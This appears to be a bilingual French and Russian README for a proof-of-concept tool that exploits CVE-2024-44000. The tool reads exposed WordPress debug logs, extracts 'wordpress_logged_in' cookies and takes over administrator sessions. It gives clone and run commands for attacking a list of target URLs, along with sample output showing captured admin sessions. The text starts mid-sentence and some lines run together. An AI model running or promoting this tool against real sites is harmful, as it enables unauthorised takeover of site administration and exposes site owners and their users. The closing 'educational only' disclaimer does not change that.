
est un outil de PoC conçu pour exploiter les journaux de débogage exposés de manière non sécurisée de sites WordPress et extraire les cookies de session.
GenCookieSessionHijack est un outil PoC conçu pour exploiter les journaux de débogage exposés de manière non sécurisée sur des sites WordPress et extraire les cookies de session. Cela permet à l’attaquant de détourner des sessions administrateur actives et d’obtenir un accès non autorisé au tableau de bord d’administration WordPress.
wordpress_logged_in).git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt
list.txt).python GenCookieSessionHijack.py -f list.txt -o result.txt
-f, --file : Chemin vers le fichier contenant la liste des URL (par défaut : list.txt).-o, --output : Fichier pour enregistrer les résultats (par défaut : result.txt).python GenCookieSessionHijack.py -f targets.txt -o output.txt
Cette commande lira la liste des URL depuis targets.txt, tentera d’extraire et d’utiliser les cookies de session, et enregistrera les résultats dans output.txt.
Si la tentative de détournement de session réussit, l’outil générera une URL avec le cookie de session administrateur détourné et l’ouvrira directement dans le navigateur par défaut.
[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie
[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404
Cet outil est destiné uniquement à des fins éducatives et ne doit pas être utilisé pour des activités illégales. L’auteur n’est pas responsable de toute utilisation abusive ou de tout dommage causé par cet outil.
GenCookieSessionHijack — это PoC скрипт, созданный для эксплуатации уязвимо раскрытых отладочных логов на сайтах WordPress с целью извлечения сессионных cookies. Это позволяет злоумышленнику перехватить активные сеансы администратора и получить несанкционированный доступ к панели администрирования WordPress.
wordpress_logged_in).git clone https://github.com/geniuszly/CVE-2024-44000
cd CVE-2024-44000
pip install -r requirements.txt
list.txt).python GenCookieSessionHijack.py -f list.txt -o result.txt
-f, --file: Путь к файлу со списком URL (по умолчанию: list.txt).-o, --output: Файл для сохранения результатов (по умолчанию: result.txt).python GenCookieSessionHijack.py -f targets.txt -o output.txt
Это прочитает список URL из targets.txt, попытается извлечь и использовать сессионные cookies, и сохранит результаты в output.txt.
Если попытка захвата сеанса успешна, инструмент сгенерирует URL с захваченным сессионным cookie администратора и откроет его непосредственно в браузере.
[+] Лог-файл успешно получен с http://example.com
[+] Найдены session cookies для http://example.com:
wordpress_logged_in_abcdef123456
[+] Успешно захвачен сеанс администратора с cookie: wordpress_logged_in_abcdef123456
[+] URL захваченного сеанса: http://example.com/wp-login.php?redirect_to=http://example.com/wp-admin/?wordpress_logged_in_abcdef123456
[+] Установленный cookie: http://example.com/wp-login.php?cookie=wordpress_logged_in_abcdef123456
[-] Не удалось захватить сеанс администратора с cookie: wordpress_logged_in_invalidcookie
[-] Session cookies не найдены в логах для http://another-example.com
[-] Не удалось получить лог-файл для http://another-example.com. Код ответа: 404
Этот инструмент предназначен исключительно для образовательных целей и не должен использоваться для незаконных действий. Автор не несет ответственности за любое неправомерное использование или ущерб, вызванный этим инструментом.